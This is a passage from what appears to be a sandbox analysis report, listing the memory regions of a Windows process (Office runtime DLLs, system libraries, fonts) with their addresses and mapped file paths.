filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-localization-l1-2-0.dll")
Region:
id = 278
start_va = 0x7fef5380000
end_va = 0x7fef5382fff
entry_point = 0x7fef5380000
region_type = mapped_file
name = "api-ms-win-core-file-l2-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-file-l2-1-0.dll")
Region:
id = 279
start_va = 0x7fef5550000
end_va = 0x7fef5552fff
entry_point = 0x7fef5550000
region_type = mapped_file
name = "api-ms-win-core-timezone-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-core-timezone-l1-1-0.dll")
Region:
id = 280
start_va = 0x7fef55a0000
end_va = 0x7fef5691fff
entry_point = 0x7fef55a0000
region_type = mapped_file
name = "ucrtbase.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ucrtbase.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\ucrtbase.dll")
Region:
id = 281
start_va = 0x7fef5850000
end_va = 0x7fef5856fff
entry_point = 0x7fef5850000
region_type = mapped_file
name = "msimg32.dll"
filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll")
Region:
id = 282
start_va = 0x7fef5860000
end_va = 0x7fef5988fff
entry_point = 0x7fef5860000
region_type = mapped_file
name = "c2r64.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\C2R64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\c2r64.dll")
Region:
id = 283
start_va = 0x7fef5990000
end_va = 0x7fef5a09fff
entry_point = 0x7fef5990000
region_type = mapped_file
name = "appvisvstream64.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvStream64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvstream64.dll")
Region:
id = 284
start_va = 0x7fef5a10000
end_va = 0x7fef5c45fff
entry_point = 0x7fef5a10000
region_type = mapped_file
name = "appvisvsubsystems64.dll"
filename = "\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\AppvIsvSubsystems64.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvsubsystems64.dll")
Region:
id = 285
start_va = 0x7fef6360000
end_va = 0x7fef6399fff
entry_point = 0x7fef6360000
region_type = mapped_file
name = "onbttnwd.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll")
Region:
id = 286
start_va = 0x7fef6560000
end_va = 0x7fef656efff
entry_point = 0x7fef6560000
region_type = mapped_file
name = "msointl30.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\msointl30.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl30.dll")
Region:
id = 287
start_va = 0x7fef6590000
end_va = 0x7fef65b6fff
entry_point = 0x7fef6590000
region_type = mapped_file
name = "sppc.dll"
filename = "\\Windows\\System32\\sppc.dll" (normalized: "c:\\windows\\system32\\sppc.dll")
Region:
id = 288
start_va = 0x7fef6660000
end_va = 0x7fef66d3fff
entry_point = 0x7fef6660000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 289
start_va = 0x7fef7a10000
end_va = 0x7fef7af1fff
entry_point = 0x7fef7a10000
region_type = mapped_file
name = "d2d1.dll"
filename = "\\Windows\\System32\\d2d1.dll" (normalized: "c:\\windows\\system32\\d2d1.dll")
Region:
id = 290
start_va = 0x7fef8550000
end_va = 0x7fef8708fff
entry_point = 0x7fef8550000
region_type = mapped_file
name = "office.odf"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf")
Region:
id = 291
start_va = 0x7fef8710000
end_va = 0x7fef8a25fff
entry_point = 0x7fef8710000
region_type = mapped_file
name = "msi.dll"
filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll")
Region:
id = 292
start_va = 0x7fef8a30000
end_va = 0x7fef8a32fff
entry_point = 0x7fef8a30000
region_type = mapped_file
name = "api-ms-win-crt-utility-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-utility-l1-1-0.dll")
Region:
id = 293
start_va = 0x7fef8a40000
end_va = 0x7fef8a44fff
entry_point = 0x7fef8a40000
region_type = mapped_file
name = "api-ms-win-crt-math-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-math-l1-1-0.dll")
Region:
id = 294
start_va = 0x7fef8a50000
end_va = 0x7fef8a52fff
entry_point = 0x7fef8a50000
region_type = mapped_file
name = "api-ms-win-crt-environment-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-environment-l1-1-0.dll")
Region:
id = 295
start_va = 0x7fef8a60000
end_va = 0x7fef8a62fff
entry_point = 0x7fef8a60000
region_type = mapped_file
name = "api-ms-win-crt-filesystem-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll")
Region:
id = 296
start_va = 0x7fef8a70000
end_va = 0x7fef8a72fff
entry_point = 0x7fef8a70000
region_type = mapped_file
name = "api-ms-win-crt-time-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-time-l1-1-0.dll")
Region:
id = 297
start_va = 0x7fef8a80000
end_va = 0x7fef8a84fff
entry_point = 0x7fef8a80000
region_type = mapped_file
name = "api-ms-win-crt-multibyte-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll")
Region:
id = 298
start_va = 0x7fef8a90000
end_va = 0x7fef8a92fff
entry_point = 0x7fef8a90000
region_type = mapped_file
name = "api-ms-win-crt-locale-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-locale-l1-1-0.dll")
Region:
id = 299
start_va = 0x7fef8aa0000
end_va = 0x7fef8aa3fff
entry_point = 0x7fef8aa0000
region_type = mapped_file
name = "api-ms-win-crt-convert-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-convert-l1-1-0.dll")
Region:
id = 300
start_va = 0x7fef8ab0000
end_va = 0x7fef8b4dfff
entry_point = 0x7fef8ab0000
region_type = mapped_file
name = "msvcp140.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\msvcp140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\msvcp140.dll")
Region:
id = 301
start_va = 0x7fef8b50000
end_va = 0x7fef8b53fff
entry_point = 0x7fef8b50000
region_type = mapped_file
name = "api-ms-win-crt-stdio-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-stdio-l1-1-0.dll")
Region:
id = 302
start_va = 0x7fef8b60000
end_va = 0x7fef8b62fff
entry_point = 0x7fef8b60000
region_type = mapped_file
name = "api-ms-win-crt-heap-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-heap-l1-1-0.dll")
Region:
id = 303
start_va = 0x7fef8b70000
end_va = 0x7fef8b73fff
entry_point = 0x7fef8b70000
region_type = mapped_file
name = "api-ms-win-crt-string-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-string-l1-1-0.dll")
Region:
id = 304
start_va = 0x7fef8cd0000
end_va = 0x7fef8cd3fff
entry_point = 0x7fef8cd0000
region_type = mapped_file
name = "api-ms-win-crt-runtime-l1-1-0.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\api-ms-win-crt-runtime-l1-1-0.dll")
Region:
id = 305
start_va = 0x7fef8ce0000
end_va = 0x7fef8cf6fff
entry_point = 0x7fef8ce0000
region_type = mapped_file
name = "vcruntime140.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\vcruntime140.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\vcruntime140.dll")
Region:
id = 306
start_va = 0x7fef93f0000
end_va = 0x7fef9496fff
entry_point = 0x7fef93f0000
region_type = mapped_file
name = "dxgi.dll"
filename = "\\Windows\\System32\\dxgi.dll" (normalized: "c:\\windows\\system32\\dxgi.dll")
Region:
id = 307
start_va = 0x7fef94a0000
end_va = 0x7fef94f4fff
entry_point = 0x7fef94a0000
region_type = mapped_file
name = "d3d10_1core.dll"
filename = "\\Windows\\System32\\d3d10_1core.dll" (normalized: "c:\\windows\\system32\\d3d10_1core.dll")
Region:
id = 308
start_va = 0x7fef9500000
end_va = 0x7fef9533fff
entry_point = 0x7fef9500000
region_type = mapped_file
name = "d3d10_1.dll"
filename = "\\Windows\\System32\\d3d10_1.dll" (normalized: "c:\\windows\\system32\\d3d10_1.dll")
Region:
id = 309
start_va = 0x7fefb050000
end_va = 0x7fefb179fff
entry_point = 0x7fefb050000
region_type = mapped_file
name = "windowscodecs.dll"
filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll")
Region:
id = 310
start_va = 0x7fefb180000
end_va = 0x7fefb197fff
entry_point = 0x7fefb180000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 311
start_va = 0x7fefb340000
end_va = 0x7fefb554fff
entry_point = 0x7fefb340000
region_type = mapped_file
name = "gdiplus.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_2b24536c71ed437a\\gdiplus.dll")
Region:
id = 312
start_va = 0x7fefb560000
end_va = 0x7fefb5b5fff
entry_point = 0x7fefb560000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 313
start_va = 0x7fefb980000
end_va = 0x7fefb9b4fff
entry_point = 0x7fefb980000
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 314
start_va = 0x7fefbec0000
end_va = 0x7fefbed0fff
entry_point = 0x7fefbec0000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 315
start_va = 0x7fefbee0000
end_va = 0x7fefbeeafff
entry_point = 0x7fefbee0000
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 316
start_va = 0x7fefbf70000
end_va = 0x7fefbf84fff
entry_point = 0x7fefbf70000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 317
start_va = 0x7fefc060000
end_va = 0x7fefc253fff
entry_point = 0x7fefc060000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 318
start_va = 0x7fefc4e0000
end_va = 0x7fefc60bfff
entry_point = 0x7fefc4e0000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 319
start_va = 0x7fefc740000
end_va = 0x7fefc76cfff
entry_point = 0x7fefc740000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 320
start_va = 0x7fefc910000
end_va = 0x7fefc91bfff
entry_point = 0x7fefc910000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 321
start_va = 0x7fefcaf0000
end_va = 0x7fefcb0dfff
entry_point = 0x7fefcaf0000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 322
start_va = 0x7fefcd40000
end_va = 0x7fefcd86fff
entry_point = 0x7fefcd40000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 323
start_va = 0x7fefd040000
end_va = 0x7fefd056fff
entry_point = 0x7fefd040000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 324
start_va = 0x7fefd5e0000
end_va = 0x7fefd5eafff
entry_point = 0x7fefd5e0000
region_type = mapped_file
name = "secur32.dll"
filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll")
Region:
id = 325
start_va = 0x7fefd610000
end_va = 0x7fefd634fff
entry_point = 0x7fefd610000
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 326
start_va = 0x7fefd640000
end_va = 0x7fefd64efff
entry_point = 0x7fefd640000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 327
start_va = 0x7fefd650000
end_va = 0x7fefd6e0fff
entry_point = 0x7fefd650000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 328
start_va = 0x7fefd6f0000
end_va = 0x7fefd72cfff
entry_point = 0x7fefd6f0000
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 329
start_va = 0x7fefd730000
end_va = 0x7fefd743fff
entry_point = 0x7fefd730000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 330
start_va = 0x7fefd750000
end_va = 0x7fefd75efff
entry_point = 0x7fefd750000
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")
Region:
id = 331
start_va = 0x7fefd7f0000
end_va = 0x7fefd7fefff
entry_point = 0x7fefd7f0000
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 332
start_va = 0x7fefd800000
end_va = 0x7fefd839fff
entry_point = 0x7fefd800000
region_type = mapped_file
name = "wintrust.dll"
filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")
Region:
id = 333
start_va = 0x7fefd840000
end_va = 0x7fefd9a6fff
entry_point = 0x7fefd840000
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 334
start_va = 0x7fefd9c0000
end_va = 0x7fefd9cffff
entry_point = 0x0
region_type = private
name = "private_0x000007fefd9c0000"
filename = ""
Region:
id = 335
start_va = 0x7fefd9d0000
end_va = 0x7fefda3afff
entry_point = 0x7fefd9d0000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 336
start_va = 0x7fefda40000
end_va = 0x7fefda75fff
entry_point = 0x7fefda40000
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 337
start_va = 0x7fefdb40000
end_va = 0x7fefdb6dfff
entry_point = 0x7fefdb40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 338
start_va = 0x7fefdb70000
end_va = 0x7fefdd46fff
entry_point = 0x7fefdb70000
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 339
start_va = 0x7fefdd50000
end_va = 0x7fefddeefff
entry_point = 0x7fefdd50000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 340
start_va = 0x7fefde70000
end_va = 0x7fefdf46fff
entry_point = 0x7fefde70000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 341
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
entry_point = 0x7fefdf50000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 342
start_va = 0x7fefe1c0000
end_va = 0x7fefe3c2fff
entry_point = 0x7fefe1c0000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 343
start_va = 0x7fefe550000
end_va = 0x7fefe5e8fff
entry_point = 0x7fefe550000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 344
start_va = 0x7fefe5f0000
end_va = 0x7fefe63cfff
entry_point = 0x7fefe5f0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 345
start_va = 0x7fefe640000
end_va = 0x7fefe76cfff
entry_point = 0x7fefe640000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 346
start_va = 0x7fefe770000
end_va = 0x7fefe7e0fff
entry_point = 0x7fefe770000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 347
start_va = 0x7fefe7f0000
end_va = 0x7fefe841fff
entry_point = 0x7fefe7f0000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 348
start_va = 0x7fefe850000
end_va = 0x7feff5d7fff
entry_point = 0x7fefe850000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 349
start_va = 0x7feff710000
end_va = 0x7feff818fff
entry_point = 0x7feff710000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 350
start_va = 0x7feff8c0000
end_va = 0x7feff8defff
entry_point = 0x7feff8c0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 351
start_va = 0x7feff8e0000
end_va = 0x7feff9bafff
entry_point = 0x7feff8e0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 352
start_va = 0x7feff9c0000
end_va = 0x7feff9c7fff
entry_point = 0x7feff9c0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 353
start_va = 0x7feff9d0000
end_va = 0x7feffa36fff
entry_point = 0x7feff9d0000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 354
start_va = 0x7feffa40000
end_va = 0x7feffb08fff
entry_point = 0x7feffa40000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 355
start_va = 0x7feffb20000
end_va = 0x7feffb20fff
entry_point = 0x7feffb20000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 356
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 357
start_va = 0x7fffff80000
end_va = 0x7fffff8ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 358
start_va = 0x7fffff90000
end_va = 0x7fffff9ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 359
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 360
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 361
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 362
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 363
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 364
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 365
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 366
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 367
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 368
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 369
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 370
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 371
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 372
start_va = 0x7fffffdb000
end_va = 0x7fffffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdb000"
filename = ""
Region:
id = 373
start_va = 0x7fffffdd000
end_va = 0x7fffffddfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 374
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 375
start_va = 0x2400000
end_va = 0x2408fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002400000"
filename = ""
Region:
id = 376
start_va = 0x2570000
end_va = 0x2593fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002570000"
filename = ""
Region:
id = 377
start_va = 0x26a0000
end_va = 0x2719fff
entry_point = 0x26a0000
region_type = mapped_file
name = "segoeuib.ttf"
filename = "\\Windows\\Fonts\\segoeuib.ttf" (normalized: "c:\\windows\\fonts\\segoeuib.ttf")
Region:
id = 378
start_va = 0x2720000
end_va = 0x2728fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002720000"
filename = ""
Region:
id = 379
start_va = 0x29c0000
end_va = 0x29c4fff
entry_point = 0x29ca5b8
region_type = mapped_file
name = "onbttnwd.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\ONBttnWD.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onbttnwd.dll")
Region:
id = 380
start_va = 0x29e0000
end_va = 0x2a03fff
entry_point = 0x0
region_type = private
name = "private_0x00000000029e0000"
filename = ""
Region:
id = 381
start_va = 0x2a40000
end_va = 0x2a43fff
entry_point = 0x2a40000
region_type = mapped_file
name = "stdole2.tlb"
filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb")
Region:
id = 382
start_va = 0x2b70000
end_va = 0x2c6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002b70000"
filename = ""
Region:
id = 383
start_va = 0x4ad0000
end_va = 0x4aeffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004ad0000"
filename = ""
Region:
id = 384
start_va = 0x4c70000
end_va = 0x4c8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004c70000"
filename = ""
Region:
id = 385
start_va = 0x74b0000
end_va = 0x75affff
entry_point = 0x0
region_type = private
name = "private_0x00000000074b0000"
filename = ""
Region:
id = 386
start_va = 0x7fef91c0000
end_va = 0x7fef9216fff
entry_point = 0x7fef91c0000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 387
start_va = 0x9430000
end_va = 0x952ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000009430000"
filename = ""
Region:
id = 388
start_va = 0x7fef8f30000
end_va = 0x7fef91b0fff
entry_point = 0x7fef8f30000
region_type = mapped_file
name = "filesyncshell64.dll"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6917.0607\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\onedrive\\17.3.6917.0607\\amd64\\filesyncshell64.dll")
Region:
id = 389
start_va = 0x7fefdf60000
end_va = 0x7fefe1b8fff
entry_point = 0x7fefdf60000
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 390
start_va = 0x7fefe3d0000
end_va = 0x7fefe547fff
entry_point = 0x7fefe3d0000
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 391
start_va = 0x7feff5e0000
end_va = 0x7feff709fff
entry_point = 0x7feff5e0000
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 392
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 393
start_va = 0x2730000
end_va = 0x2731fff
